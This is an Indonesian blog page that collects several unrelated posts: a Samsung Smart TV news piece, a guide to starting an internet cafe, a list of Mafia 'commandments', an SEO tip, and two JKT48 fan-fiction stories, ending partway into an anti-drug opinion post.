Info Menarik | Lagu Lagu | Games | Templates

Cari di Blog Ini

Samsung Smart TV



[JAKARTA] Kategori Smart TV atau “TV Cerdas” tidak hanya sama dengan TV internet. Teknologi Samsung Smart TV telah jauh berkembang. Alhasil TV tak cuma menampilkan gambar memukau, tapi juga diperintah secara personal lewat suara dan mengenali penggunanya.  

Samsung Electrics telah mengembangkan inovasi Smart TV dengan Smart Interaction, Smart Content, Smart Evolution. Teknologi LED teranyar ini dibenamkan pada produk ES7500 dan ES8000. Dengan Smart Interaction, pengguna dapat berinteraksi dengan televisi cerdas.  

“Visi Samsung adalah menciptakan konetivitas yang tidak terbatas dan memudahkan orang berbagi konten. Visi ‘Kehidupan Saling Terkoneksi’ merupakan pengguna dapat mengambil gambar dengan ponsel atau kamera lalumenyebarkannya lewat ponsel atau kamera,” kata Managing D|irector  PT Samsung  Electronics Indonesia, Yoo Young Kim saat membuka Pameran Samsung Smart City di Senayan City yang berlangsung hingga 29 April 2012.  

Menurut Kim, Samsung Smart TV memiliki ribuan konten yang mendukung gaya hidup cerdas. Dengan kecerdasan itu, pengguna dapat saling terkoneksi dengan produk-produk lainnya.   “Produk baru ini menawarkan lebih banyak konten, layar interaktif, pengatur intuitif, kualitas gambar prima, serta desain menawan,” tambah Consumer Electronic Business Director Samsung Indonesia Iffan Suryanto.  

Samsung Smart TV dapat mengenali suara dan gerakan sebagai perintah yang diterima lewat microfon dan kamera. Bahkan wajah pengguna pun dapat dikenali oleh TV jenis ini. Perintah diterima dalam bahasa Inggris, dimulai dengan sapaan “Hi TV”, lalu disusul dengan perintah lanjutan sederhana dalam dua suku kata.  

Untuk perintah gerakan dari jarak 2-3 meter, pengguna memulai dengan lambaian tangan, lalu menggunakan tangan sebagai kursor. Sebagai tanda pilihan, pengguna mengepalkan tangan. Sayang, perintah suara mungkin tidak direspons dengan baik karena logat pengguna atau suasana ruangan terlalu bising.  

“Saat ini, menu perintah masih menggunakan bahasa Inggris. Saat ini, menu perintah belum dikembangkan dalam bahasa Indonesia. Mungkin akan diperluas juga. Tetapi dengan segmen pasar premium, menu perintah bahasa Inggris bisa cukup diterima,” tutur Head of AV Product Marketing Samsung Indonesia Marvy Arnold Lumentut.  

Menurut Marvy, teknologi Samsung Smart TV kini dapat mengikuti perkembangan zaman. Pengguna yang memiliki Smart TV saat ini dapat melakukan pembaruan sistem dengan mengganti Central Processing Unit (CPU), Graphics Processing Unit (GPU), tanpa harus mengganti TV yang baru.  

Untuk tipe ES800, produk TV premium ini  dijual dengan harga sekitar Rp 28 juta. Sementara Samsung Smart TV tipe ES 7500 dijual dengan harga sekitar Rp 26 juta. Saat ini, penjualan Samsung Smart TV bekerja sama dengan Groovia TV untuk mendapatkan koneksi saluran televisi lewat jaringan Telkom. [U-5]       

http://www.suarapembaruan.com/home/samsung-smart-tv-diperintah-lewat-suara/19681
[Read More...]


Panduan Untuk Memulai Bisnis Warnet



Teknologi warnet (warung internet) merupakan alternatif yang gampang dan sangat dibutuhkan untuk mendapatkan akses internet yang murah. Dewasa ini sudah banyak warung internet yang menjamur di mana-mana. Warnet memungkinkan orang untuk mengakses internet hanya dengan biaya 2000 hingga 5000 perjamnya. Oleh karena itu tidak heran jika banyak orang yang menggunakan alternatif ini untuk bisa mengakses dunia maya.
Secara umum ada dua faktor utama yang perlu dilihat untuk memulai bisnis ini. Yang pertama dari segi bisnis dan manajemennya, dan juga dari segi teknologinya.
Bisnis Warnet
Dari sisi bisnis dan manajemennya, isunya biasanya berkisar pada masalah pemasaran, promosi, dan masalah bagaimana mendatangkan pelanggan. Jangan pernah berkonsentrasi pada masalah teknis, karena pada akhirnya sense of business menjadi faktor penentu keberhasilan bisnis warnet ini. Komponen dalam rencana bisnis ini tidak banyak sebetulnya, yaitu:

1.       Investasi yang biasanya berkisar 4 jutaan per PC.
2.       Biaya operasional yang biasanya dihabiskan untuk membayar Telkom & ISP, selain membayar karyawan dan listrik.
3.       Tarif.
Sense of business usaha warnet ini sangat sederhana, yaitu:
a.       Letakkan warnet di tempat yang banyak orang, terutama anak muda.
b.      Semakin banyak computer yang digunakan, semakin murah tarifnya, dan semakin cepat untuk bisa balik modal.
c.       Batas minimal computer yang feasible untuk akses web sekitar 5 komputer jika menggunakan sambungan telpon dial-up.
Teknologi Warnet
Dari sisi teknologi ada beberapa isu besar yang perlu diperhatikan untuk memulai bisnis warnet. Secara umum topologi sederhana sebuah warnet konvensional tampak pada gambar. Warnet terdiri dari sebuah Local Area Network (LAN) yang tersambung ke Internet melalui sebuah gateway yang kadang-kadang juga berfungsi sebagai server. Pada tingkat yang lebih kompleks, konsep ini dapat dikembangkan dengan mudah untuk menyambungkan jaringan di kompleks perumahan (untuk membuat RT/RW-net), di kompleks pertokoan, kompleks perkantoran, di sekolah-sekolah, di kampus-kampus yang pada akhirnya memungkinkan orang Indonesia mengakses Internet dengan biaya yang sangat murah. Teknik Local Area Network (LAN) relatif cukup mapan, biasanya warnet menggunakan topologi Bus dengan ethernet 100BaseT yang murah di pasaran pada kecepatan 100Mbps di LAN. Ethernet Card yang baik bisa diperoleh dengan harga sekitar Rp150.000 per card. Sebaiknya jangan membeli yang murah sekali-sekitar Rp70.000-an-karena biasanya jelek. Pada network kampus, kompleks perumahan dan perkantoran tentunya teknik yang digunakan semakin kompleks.
Sambungan jarak jauh dari warnet ke ISP maupun ke Internet internasional mempunyai variasi yang cukup banyak.
Teknik yang paling murah adalah menggunakan dial-up melalui kabel telepon milik Telkom ke ISP lokal. Teknik sederhana ini persis sama dengan pola yang dipakai untuk akses Internet di rumah-rumah.
Sebagian warnet, kompleksn perkantoran, kompleks perumahan yang lebih maju umumnya tidak lagi menggunakan Telkom karena selain kualitas jaringannya kurang baik, kecepatan aksesnya juga lambat yang semua mengurangi laba warnet. Teman-teman yang lebih maju ini umumnya menggunakan peralatan microwave buatan sendiri di frekuensi 2.4GHz, beberapa bereksperimen juga di frekuensi 5.8GHz. Yang terakhir ada beberapa rekan yang juga mencoba menggunakan gelombang cahaya infra merah di antara beberapa gedung di Jakarta. Kecepatan pengiriman dengan menggunakan peralatan microwave atau cahaya infra merah ini cukup menakjubkan, sekitar 2-11Mbps. Jika di paksakan menggunakan gelombang infra merah dapat mencapai kecepatan 155Mbps.

http://tempatorangbodoh.wordpress.com/2009/04/09/panduan-untuk-memulai-bisnis-warnet/
[Read More...]


Organisasi Mafia Terapih di Dunia




La Cosa Nostra. adalah nama yang digunakan anggota Mafia italia amerika. 

La Cosa Nostra digunakan
oleh Salvatore Maranzano
pada tahun 1931 ketika dia
menamakan dirinya Capo di
tutti capi, atau “bos segala
bos”

Yang menarik mereka
punya kode etik yg bagus yg
disebut The Godfather’s Ten
Commandments!

Inilah dia kode etik nya:
1. Dilarang memperkenalkan diri secara
langsung kepada pihak kedua

2. Dilarang “main mata”
dengan isteri sesama
anggota.*istri mafia italia
biasanya memang cantik2*

3. Jangan sampai terlihat
oleh polisi.

4. Dilarang dugem di tempat
hiburan malam seperti pub
dan klub karena aktivitas
seperti itu sama bodohnya
dengan menjeratkan diri
sndiri!

5. Harus selalu siaga demi
panggilan tugas mafia, bahkan ketika isterimu melahirkan!

6. Janji untuk bertemu
harus dipatuhi.

7. Isteri harus
diperlakukan dengan hormat.
Karena jika anda tidak bisa
hormat dengan istri, apalagi
dengan organisasi !

8. Bila ditanya soal
informasi apapun, maka
jawabannya haruslah benar.

9. Dilarang menerima
uang yang menjadi hak rekan lain atau keluarganya

10. Orang-orang yang
tidak bisa bergabung dengan
mafia: Orang yang dekat
dengan polisi

Nggak disangka mafia
punya aturan sebagus itu.
Bandingkan dengan pegawai di Republik Indonesia ini!

Pegawai di RI Ada yang
berselingkuh dengan isteri
sesama pegawai, mengambil uang jatah rakyat, membolos dalam rapat legislatif

pura-pura sakit bila
dipanggil jaksa, dan masih
banyak lagi yang tentunya
membuat malu bangsa
Indonesia.msh lbh bagus
mafia dgn kode etik

Bila ada anggota mafia yg
melanggar The Godfather’s
Ten Commandments
hukumannya adalah MATI!
[Read More...]


Trik Agar Postingan Blog Masuk Baris Pertama di Google



Mungkin trik ini sudah banyak yang tau, tapi ga papalah share lagi.. :D

Trik ini saya temukan secara tidak sengaja ketika iseng iseng nambah situs di google webmaster tools setelah posting, eh ternyata berhasil, postingan Cerita: Separuh Aku, Gaby sama Selamatkan Generasi Bangsa dari Bahaya Narkoba ini masuk baris pertama di google.

untuk caranya bisa langsung ke Google Webmaster trus klik tombol merah yang ada tulisan "Tambahkan Situs" dan masukkan url / alamat blogmu (alamat blog beda sama alamat postingan ya, contoh http://adhifahreza.blogspot.com/ itu alamat blog, sedangkan alamat post yaitu http://adhifahreza.blogspot.com/2012/10/kakak-keduaku.html) di pop up / kotak yang muncul.
selesai, mudah bukan?
walaupun trik ini gak selalu berhasil, tapi apa salahnya mencoba?  ya kan


wassalam 


[Read More...]


Kakak Keduaku



‘Kereta Api Progo AC dengan tujuan Bandung telah memasuki lintasan 3, para penumpang diharapkan untuk tetap tertib. Terimakasih’

Suara pengumuman di dalam stasiun dan segera aku mencari gerbong dan tempat duduk sesuai dengan tiket yang ada di tanganku. Ini pertama kalinya aku naik ke
reta setelah lebih dari 7tahun yang lalu. Perasaanku sedikit takut tapi apa boleh buat, cuma ini yang bisa membuatku tenang sejenak.

‘Coklat.. coklat.. coklat.. coklat spesial di hari valentine, coklatnya Pak?”, kata pedagang asongan yang menawarkan coklat ke orang kursi sebelah.
Aku pakai headsetku dan memutar lagu-lagu pop rock dari MP4-ku. Beberapa menit kemudian, keretapun mulai berjalan.

Ini adalah hari ke-3 aku meninggalkan rumah setelah kejadian itu. Kejadian yang membuat aku berfikir betapa tidak dibutuhkannya aku dalam keluargaku. Fifin, saudara kandungku yang lebih muda dariku 5tahun, ia dipuja mati-matian oleh ibu dan ayahku. Aku selalu dijadikan bahan pembanding dengannya mulai dari A sampai Z. Kejadian itu hampir setiap hari setelah kepergian kakak perempuanku. Dan tiga hari yang lalu adalah klimaks dari permasalahan itu sehingga aku bertekad untuk pergi dari rumah.

Hanya dengan modal menjual ponselku demi meninggalkan rumah itu, beberapa potong baju, 2 celana jeans, sepatu dan jaket yang sedang aku kenakan.

***

Bandung i’m coming !! Pagi hari, pukul 07.25 aku sampai di Stasiun Kiaracondong. Tepat seperti yang tertulis di tiket kereta bahwa kereta akan sampai pada jam tersebut.

Turun dari kereta aku langsung menuju tempat penginapan yang kemarin sudah aku booked. Benar-benar dengan nekatnya aku memberanikan diri menginjakkan kaki di kota orang yang sebelumnya aku belum pernah sekalipun kesini. Tak apalah, mungkin hanya sekali seumur hidup aku bertindak bodoh seperti ini, candaku dalam hati.

Sesampainya di penginapan aku langsung rebahan sejenak dan berpikir apa tujuanku hari ini. Kriik kriikk.. benar-benar sangat sepi suasana di penginapan karena saat itu memang bukan musim liburan jadi sedikit yang menginap. Aku melihat kertas yang tertempel di dinding, aku beranjak dari tempat tidur dan membacanya. ‘Rental motor’ dan ‘Kawah putih’, dua kata menarik yang ada dalam kertas itu. Nah ! Ide gilaku pun muncul.

Langsung aku menuju ke Front Office dan menanyakan tentang rental motor dan arah menuju Kawah Putih. Sekitar 10 menit aku berbincang dengan pegawai tersebut dan sudah ku tetapkan untuk menyewa motor untuk pergi ke Kawah Putih hari itu juga.

‘breemm.. breemm’ suara motor matik yang aku sewa, akupun berangkat.
Instingku dalam mencari jalan menuju Kawah Putih sudah dimulai. Beberapa kali salah jalan dan memutari jalan sampai dua kali yang memakan waktu hampir 3,5 jam akhirnya aku sampai juga di Kawah Putih. “This is ‘My First Extreme Experience’ !”, gumamku.

***

Waktu menunjukkan pukul 13.00. Aku berjalan mengelilingi daerah itu, memotret objek-objek yang menurutku menarik. Namun, ditengah asiknya memotret

ada seseorang yang membuatku penasaran. Sesosok perempuan yang sedang menundukkan kepala yang disenderkan di lutut yang sedang ditekuk. Bentuk tubuh dan potongan rambutnya persis seperti.. Ah, kenangan itu kembali lagi. Keceriaanku tiba-tiba berubah menjadi sendu. Cukup lama aku terdiam merenung sambil mengamati perempuan yang tidak berada jauh dariku.

Sesekali aku mendengar isakan tangis. Perlahan aku dekati perempuan itu dan ternyata itu adalah suara tangisannya. Suasana disitu sepi sekali, hanya ada aku, perempuan itu dan segerombolan orang bule yang sedang berwisata.

“Permisi, maaf mengganggu sudah hampir 1jam lebih aku mlihat kakak menundukkan kepala sambil menangis. Apa ada yang bisa saya bantu?”, aku bilang kepadanya. Karena memang aku tidak tega jika melihat seseorang sedang bersedih sendirian.

Sepertinya perempuan itu sedikit kaget karena kedatanganku, dia segera menengok ke arahku sambil mengusap air matanya dengan lengan bajunya. “Oh tidak apa-apa, aku memang sudah biasa disini sendiri. Lagipula tempat ini tidak jauh dari rumahku”, jawabnya dengan lembut dan sedikit tersenyum.

“Tapi aku liat kakak menunduk terus daritadi dan sesekali menangis, aku takut kakak kenapa-kenapa disini. Kakak kenapa?”, kataku dengan wajah khawatir.
“Kamu pendatang ya?” Dia mengalihkan pembicaraan.

“Iya, memang kalo pendatang tidak boleh bicara dengan orang Bandung ya Kak?”,celetukku. Karena terlihat sekali logat Sunda yang diucapkan perempuan itu.

“Bukan begitu, sepertinya kamu juga sendirian disini. Seharusnya kamu yang lebih berhati-hati karena disini rawan”

“Sudahlah kak, jangan mengalihkan pembicaraan. Masa bodoh dengan aku. Aku cuma tidak mau melihat kakak murung seperti ini”

Dahinya sedikit mengerut dan sedikit menaikkan alisnya. “Masa bodoh? Maksudnya? Ada apa dengan kamu?”

“Emm sbelumnya kenalkan aku Firanny, panggil aku Fira, kakak siapa?”. Aku ganti mengalihkan pembicaraan.

“Aku Melo, Melody. Bolehkah aku dengar ceritamu?”
Aku merasa perempuan itu mulai curiga dengan jawaban spontanku tadi. Tapi aku juga lebih curiga kenapa dia ingin tau cerita tentangku.

“Sepertinya sudah mulai sore Kak. Gimana kalo kita pulang saja? Rumah kakak dimana? Biar aku antar pulang” Sengaja aku alihkan pembicaraan lagi.
“Tidak usah, aku bisa pulang sendiri kok. Maaf kalo tangisku tadi menyusahkan kamu”, katanya dengan wajah agak memelas.

“Enggak kok Kak. Nggak apa-apa. Ayo Kak aku antar pulang. Biar ku pastikan kakak tidak kenapa-kenapa dijalan”, kataku dengan sedikit memaksa.
Dia terdiam sesaat, sedang berfikir tampaknya.

“Oke, baiklah, tapi tidak usah antarkan aku pulang. Cukup antarkan aku ke suatu tmpat saja ya?”

“Iya kak”, jawabku dengan penuh senyum.
Kita pun memulai perjalanan turun menuju kota dengan motor matik yang ku sewa tadi pagi. Ditengah perjalanan...

“Hei kamu, maaf tadi siapa namamu? Ak lupa karna tadi sedang tidak konsen”, tanyanya dengan sedikit teriak karena laju motor agak ku kebut.

“Firanny kak, panggil Fir atau Fira saja” Sambil ku pelankan gas motor yang ku kendarai.
“Oh iya Fira. Kamu sudah hafal jalan-jalan disini?”
“Belum sama sekali Kak”

“Lah kamu aja belum tau jalan kok mau ngantar pulang, terus kamu gimana pulangnya nanti? Dasar!”, jawabnya dengan kesal.

“Hehe ya tanya-tanya kak, aku juga bawa peta sama GPS kok”, candaku ke Kak Melo.
“Tapi itu kan belum tentu valid”, jawabnya dengan kesal lagi.
“Ya resikolah. Ini kita mau kemana Kak?”
“Ini nanti sampai di jalan besar kamu belok kanan, sampai perempatan belok kiri terus lurus terus sampai ada semacam tugu kamu belok kanan, nah nanti kan ada......”
Belum selesai dia berbicara panjang lebar sambil menunjuk-nunjukkan arah, aku potong kata-katanya,“Udah udah Kak, jangan panjang-panjang. Bingung aku nanti” Sambil aku turunkan tangannya dari samping mukaku.

“Hahaha, iya iya. Maaf deh” kata Kak Melo dengan cekikikan.
Langsung ku gas motor itu dengan sedikit knecang karena sudah mulai petang. Jam setengah 7 tepat aku sampai di lokasi yang diarahkan Kak Melo.
Kafe yang begitu fantastik dengan lampu sedikit remang-remang juga ditambah suasana yang tidak begitu ramai menambah ketenangan saat memasuki kafe ini. Kak Melo pun memesan makanan untuk kita berdua.

“Kak tempatnya keren banget, betah deh disini seharian”, kataku sambil melihat sekeliling kafe. Karena kafe ini benar-benar memiliki view yang sangat indah.
“Yakin betah?”
“Iya, suer Kak!”
“Yaudah kita semalaman disini aja, aku malas pulang juga soalnya” , jawabnya santai sambil memainkan ponselnya.
Aku kaget ketika Kak Melo menjawab seperti itu, aku kira kata-katanya tadi hanya candaan saja.
“Serius Kak??”
“Iya serius”, jawab Kak Melo dengan senyum, ditambah lesung pipit nya yang membuat ia semakin terlihat sangat manis.
‘Because you had a bad day. You're taking one down. You sing a sad song just to turn it around. You say you don't know~’
Ponsel Kak Melo berbunyi.
“Iya halo fries. Ooh, tolong bilang ke Teteh kalo Teh Melo lagi ada kerjaan ya? Mungkin besok pagi pulangnya. Iya.. Iya.. Oke, kamu jangan tidur malem-malem ya. Daaa” Kak Melo menyudahi telfonnya.

“Itu siapa Kak?” , tanyaku
“Oh itu Frieska, adikku. Yuk kita lanjutin tentang yang di kawah tadi”
Hampir 2 jam kita bercerita dan aku tau identitas, asal usul, dan keluarga Kak Melo, begitupula sebaliknya. Sekarang aku tau kenapa aku yang dijadikan tempat curhatnya saat ini dan itu sebabnya aku mau menceritakan masalahku kepada Kak Melo.

“Fir, kamu janji ya nggak akan bilang-bilang tentang ini?”
“Iya Kak. Janji !”, jawabku dengan tegas.
Lagi-lagi Kak Melo tersenyum manis dan tampaknya dia memang benar-benar mempercayaiku.

“Makasih ya Fir, belum pernah aku bertemu orang seperti kamu. Baru kenal tapi sudah memperhatikan kesusahan oranglain. Aku salut sama kamu” Sambil menepuk bahuku.

“Ini sudah sifatku dari kecil Kak. Aku juga bersyukur baru pertama ketemu member JKT48. Nggak nyangka baik gini, biasanya kalo udah jadi idol kan cuek+jutek”, sindirku dengan ketawa dan Kak Melo langsung mencubitku.

Jujur sebelum pertemuan ini aku sama sekali belum tau Idol Grup JKT48, apalagi anggota-anggotanya. Dan ini adalah hari pertamaku tau apa itu JKT48 langsung dari anggotanya.

“Eh, kamu kalo mau wifi-an, wifi-an aja. Gratis kok. Aku mau tidur dulu yaa”, kata Kak Melo
“Siap kak !”
Aku nyalakan laptopku dan mulai browsing. Baru beberapa menit saja Kak Melo sudah tertidur pulas disampingku. Aku kasihan sekali melihat wajahnya yang tampak sangat kelelahan. Dan beberapa jam kemudian aku tertidur juga.

***

“Maaf mbak, sudah jam 7 pagi”, kata salah seorang karyawan menepuk pundakku.
Aku tersentak kaget dan terbangun. “Oh iya mas, makasih yaa”, jawabku.
Aku melihat laptopku sudah tersimpan rapi di tas. Meja yang tadinya penuh akan

makanan juga sudah bersih. Aku tidak melihat Kak Melo disekitarku. Ah, mungkin Kak Melo sedang ke kamar mandi pikirku. Aku mengusap muka dan merapihkan rambut dan baju. Sudah 10menit lewat Kak Melo tidak datang juga, aku coba mencarinya di kamar mandi tapi tidak ada. Aku bertanya kepada karyawan kafe itu satu per satu pun tidak ada yg tau. Aku mulai panik.

"Hanya karena masalah seperti itu seharusnya kamu tidak sampai kabur ke tempat jauh seperti ini. Kasihan orang tua kamu, mungkin sekarang mereka sedang mengkhawatirkanmu. Melebihi kamu yang bukan siapa-siapaku mengkhawatirkanku" Tiba-tiba aku teringat kata-kata Kak Melo semalam.

Setelah beberapa saat termenung, aku keluar dari kafe itu. Sesampainya di area parkir, aku melihat ada 1 amplop putih terselip di stang motorku. Sambil aku duduk di motor, aku baca dan ternyata itu surat dari Kak Melo.

"Fira, kmu adalah orang asing pertama yang aku percaya menjaga keluhkesahku melebihi kakak dan adikku. Kamu adalah orang asing pertama yang memberiku penuh perhatian dari awal kita bertemu dan tidak saling mengenal. Aku bangga dengan

keberanianmu sampai ke kotaku dan aku benar-benar bersyukur bertemu dengan orang yang lucu dan ramah seperti kamu. Karna kamu, perasaanku yang dari kemarin mengganjal kini sudah sedikit lega. Aku mulai bangkit lagi untuk menjalankan tugasku sebagai mahasiswi dan idol. Dan kamu, jaga baik-baik keadaanmu karena aku tidak bisa menemanimu hari ini. Tetap semangat menjalani hidup dan ingatlah kata-kataku

semalam. Terimakasih, dan sekali lagi terimakasih atas usaha kerasmu dalam mghiburku :) Aku tidak akan pernah melupakanmu.Aku janji suatu saat kita pasti akan bertemu lagi walaupun aku sudah menjadi bintang sekalipun. Tertanda, Melody Nurramdhani Laksani ^_^"

Tak terasa airmata membanjiri pipiku, aku mulai down, lemah dan tidak tau harus bagaimana cara untuk menemui Kak Melo.

Sebenarnya ada 1 hal yg Kak Melo belum tau. Kak Melo belum tau semua tentang aku kenapa aku bersikap seperti itu. Aku memiliki kakak perempuan tapi ketika aku duduk di bangku SMA dia telah pergi lebih dulu meninggalkan dunia ini karena sakit yang di deritanya. Aku sangat merindukan sosoknya. Viola namanya. Kita sangat dekat dan akrab. Mungkin karena aku dan Kak Viola hanya terpaut 1 tahun, sebaya dengan Kak Melo. Dan wajah Kak Melo sangat mirip sekali dengan Kak Viola, begitu juga dengan nama mereka yang sama-sama berunsur musik.

Cerita panjangnya semalam tidak ada satupun yang membicarakan tentang privasi kita. Alamat rumah maupun nomor telfon. Karna aku rasa hal itu akan berjalan seiring waktu dan tadi malam bukanlah waktu yang tepat untuk menanyakan hal itu.

Tanpa pikir panjang aku kembali ke penginapan, menyelesaikan biaya-biaya dan mencari tiket untuk pulang ke Jogja. Sedikit demi sedikit aku mulai menerima atas kejadian di rumah, mulai bersikap dewasa seperti apa yang diajarkan Kak Melo dan kini suasana di keluargaku pun menjadi lebih hangat. Sudah tidak ada lagi pertengkaran seperti yang sudah-sudah.

***

Tak terasa makin bertambah bulan makin sering aku mendengar JKT48, terutama nama Melody. Hal itu semakin membuat aku rindu akan Kak Melo dan Kak Viola, 2 sosok perempuan yang telah memberikan aku pelajaran berharga tentang kerasnya hidup ini.

Aku tau Kak Melo sedang fokus dengan double-job nya sekarang, mungkin bisa saja dia melupakan aku. Toh, pertemuan kita sangatlah singkat. Dimatanya aku mungkin memang bukan siapa-siapanya, pikirku.

Hari ini aku berniat untuk nonton Dahsyat di TV, karena katanya ada JKT48. Beberapa menit berlalu, sampailah diujung acara. Lagu JKT48 yang ke-3 “Baby Baby Baby” sebagai lagu penutup.

Selesai acara itu, ku matikan TV. Aku tertawa kecil dan berkaca-kaca mengingat sekilas kisahku dengan Kak Melo saat di Bandung. Betapa singkatnya kisah itu tapi sungguh mengenang. Aku masih belum bisa merelakan menghilangnya Kak Melo dari aku sejak saat itu. Karena aku masih membutuhkan sosok Kak Viola sebagai tempat aku singgah ketika aku sedang senang maupun sedih. Dan cuma dia yang bisa menggantikan Kak Viola yang tidak akan pernah bisa kembali lagi.

***

‘Aitakatta..Aitakatta..Aitakataa..*des des des*’
Suara hapeku berbunyi, nomor tak dikenal menelfonku.
"Halo?", sapaku.
"Iya halo, ini Fira ya?", jawab penelfon itu.
"Iya saya Fira, ada apa ya?" Sepertinya aku mengenal suara ini, tapi aku tidak mengingatnya dengan jelas.
"Ini aku, Kak Melo. Tadi liat Kakak perform di Dahsyat nggak?"
"Ha???!!!!"
"Hehehe, kenapa? kaget ya?", candanya.
Aku shock seketika dan suara di telfon hening beberapa saat.
"Loh kok diem? yaudah deh kakak lagi buru-buru nih, jaga kesehatan ya, jangan sampe kabur-kabur lagi hehe. Daaa"
‘tuuuut tuuuuttt tuuuutt’
Panggilan pun terputus.

Begitu speechlessnya aku mendengar suara Kak Melo sampai-sampai aku tidak bisa menjawab telefon setelah tau bahwa itu darinya dan moodku hari itu hancur berantakan.
Beberapa jam setelah telfon ditutup dan perasaanku mulai tenang aku mencoba untuk menghubungi nomer itu lagi, tapi entah kenapa tidak pernah aktif. Sampai sekarang...
https://www.facebook.com/about.jkt48?fref=ts
[Read More...]


Cerita: Separuh Aku, Gaby



“Gab..” Panggilku ke gadis di depanku.
“Apa?” Jawabnya jutek.
“Entar, abis pulang sekolah kemana?”
“Mau tau banget?”
“Iya, mau pulang bareng gak?”
“Gak, gue dijemput Boy.”
“Oh, emang, dia gak kuliah?”
“Rempong deh lo.” Ucap Gaby, dan langung meninggalkanku.

Kepalaku tertunduk lemas setelah mendapat perlakuan itu dari Gaby. Aku berjalan sendiri di lorong sekolah sampai akhirnya ada dia...

“Aa... A.. A, Azzzekk, cinta ditolak, guru BP bertindak.” Ucap Ochi.
“Elu lagi. Dari mana lu?” Tanyaku.
“Kantin, tadi gimana Gaby?”
“Ya... gitudeh.”
“Sebenernya perlakuan tidak menyenangkan dan harapan palsu bisa dihukum pidana loh.” Ucap Ochi dengan percaya diri.
“Gaya lu kayak anak hukum aja.”
“Eh ntar gue mau kuliah ambil jurusan hukum.”
“Iya, hukum rimba sama hukum karma.”
“Boy tuh siapa sih?” Lanjutku.
“Katanya mah pacarnya, anak kuliahan gitu.” Jawab Ochi.

Mendengar itu, akupun tertunduk lemas.

“Woles aja kale, baru pacar, temen gue aja ditinggal tunangan masih tetep usaha.”
“Tau deh, Chi.”
“Gaby mana?”
“Tadi sih udah jalan keluar sekolah.”

Saat aku dan Ochi jalan bersama menuju luar sekolah, teman – temanku bergerombolan keluar sekolah, mereka beramai – ramai menuju sebrang sekolah.

“Gaby!!” Teriakku.
“Aduh, gue panik! Mesti woles, mesti woles!” Ochi terlihat panik.
“Woy bantuin dong! Panggil taksi! Chi sini Chi!” Panggilku ke Ochi.
“Duh, gue lagi woles nih! Sumpah gue woles gak boong!!!” Lanjut Ochi.

“Keadaannya membaik, untung kita cepat mendapatkan donor.” Ucap seseorang berpakaian dokter.
“Ma, makasih dok, tapi saya tetep woles kok.” Ucap Ochi.

Ochi berdiri sendiri, dari ujung lorong Ochi menghampiriku.

“Kok masih lemes sih? Ayo dong semangat.” Ucap Ochi.
“Iya Chi.” Jawabku.

Aku dan Ochi berjalan bersama. Kami meninggalkan lorong itu. Sebelumnya aku sempat menatap ke sebuah ruangan, yang dilapisi dengan kaca. Aku berharap banyak dengan isi dari ruangan itu.

Hari sekolah berjalan seperti biasa. Kulihat Gaby sedang duduk sendiri di tangga sebelah kelasnya.

“Gab..”
“Apa?”
“Udah sembuhan?”
“Lumayan.”
“Kemarin gimana? Udah check up lagi?”
“Cuma bermasalah di darah doang.”

Gaby segera bangun dari duduknya dan meninggalkanku. Aku duduk sendiri di tangga itu.

Jam pelajaran olahrga adalah favoritku. Aku menikmati pemandangan indah kelas olahraga. Gaby duduk bersama teman – temannya.
Aku hanya bisa menatap Gaby dari jauh sambil bermain futsal bersama teman – temanku.
Kenapa Gaby? Ia memegangi perutnya. Ah jangan sampai lagi.
Aku harap tidak terlalu parah.

“Kondisinya makin parah, kita butuh lebih banyak lagi.” Ucap dokter.
“Memang yang tadi saya transfusi masih kurang, dok?” Tanyaku.
“Sudah cukup, tapi untuk berjaga – jaga kalau lukanya terbuka kembali.”
“Semoga tidak.”
“Ya, semoga. Tapi karena kejadian waktu itu cukup parah, lukanya bisa terbuka kapanpun jika ada benturan.”
“Hubungi saya dok, jika butuh lagi.”
“Itu urusan rumah sakit, sudah hampir separuh kamu ada di Gaby.”

Aku tertunduk. Dokter meninggalkanku. Aku kini hanya bisa menatap ruangan Gaby dirawat.

Hari ini Gaby terlihat sudah cukup sehat, semoga tidak terjadi apa – apa lagi pada dirinya.

“Masih sakit gak, Geb?” tanyaku.
“Lo peduli banget yah sama gue?”
“Gak boleh?”
“Ngapain sih lo sok care gitu sama gue? Kayak pernah ngasih sesuatu aja buat gue.”

Lagi – lagi Gaby meninggalkanku.

“Chi, Gaby mana? Gak masuk yah?” Tanyaku.
“Emang lo gak tau?”
“Enggak kenapa?”
“Dia masuk RS lagi.”

“Sekarang Gaby kenapa lagi, Dok?” Tanyaku.
“Ulu hatinya terkena infeksi akibat luka itu, ginjalnya juga kena.”
“Lalu harus apa dok?”
“Butuh donor ginjal pastinya.”

Dengan tatapan penuh harapan, aku menatap mata Dokter.

Aku yang terduduk sendiri dikelas, dihampiri Ochi.

“Udah woles belom?” Tanya Ochi.
“Yang penting dia woles dulu deh.”
“Tapi lo harus ngomong sama dia.”
“Bingung, Chi.”
“Lo harus ngomong sekarang, karena sebentar lagi lo gak akan punya waktu.”

Bu Guru masuk ke kelas, di belakangnya Gaby mengikuti membawa tas. Bu Guru memberikan pengumuman bahwa Gaby akan pindah sekolah ke luar kota. Gaby sempat mengucapkan terima kasih pada teman – teman sekelas.
Gaby keluar kelas sendiri. Ia membawa tas punggunya.

“Bu, saya izin ke toilet.” Aku langsung keluar kelas.

Aku mencari Gaby, semoga aku masih sempat mengejarnya. Gaby masih ada didepan gerbang sekolah.

“Gab..” Panggilku.
“Apa lagi?”
“Makasih.”
“Makasih kenapa?”
“Makasih, udah bisa kenal sama lo.”
“Udah?”
“Lo, udah gak kenapa – napa kan?”
“Hem... udah mendingan, kemarin dapet donor ginjal gatau dari siapa. Tapi gue makasih banget sama tuh orang.”

Mendengar itu, aku memegang perutku dengan tangan kiriku. Aku tersenyum.

“Lo kenapa megangin perut gitu? Laper?” Tanya Gaby.
“Iya, Gab.”
“Yaudah, gue udah dijemput. Maaf yah kalo pernah punya salah sama lo.”

Saat mengucapkan salam terakhir, ia sempat tersenyum manis sekali padaku. Dengan rambutnya yang panjang, senyumnya yang manis. Aku senang bisa melakukan semuanya untuk Gaby. Karena separuh aku, kini ada di Gaby.
 
 
https://www.facebook.com/about.jkt48?fref=ts
[Read More...]


Selamatkan Generasi Bangsa dari Bahaya Narkoba



Keputusan presiden yang
memberikan grasi bagi bandar narkoba memang
sangat di sayangkan oleh
banyak pihak, ketika pemerintah sedang berupaya menaikkan citra yang terpuruk, seharusnya
pemerintah lebih tanggap
terhadap masalah sensitif
yang ada di masyarakat.

narkoba adalah sebuah kejahatan kemanusiaan yang berat, kalau alasan demi kemanusiaan apakah
cukup adil? Mereka, pelaku
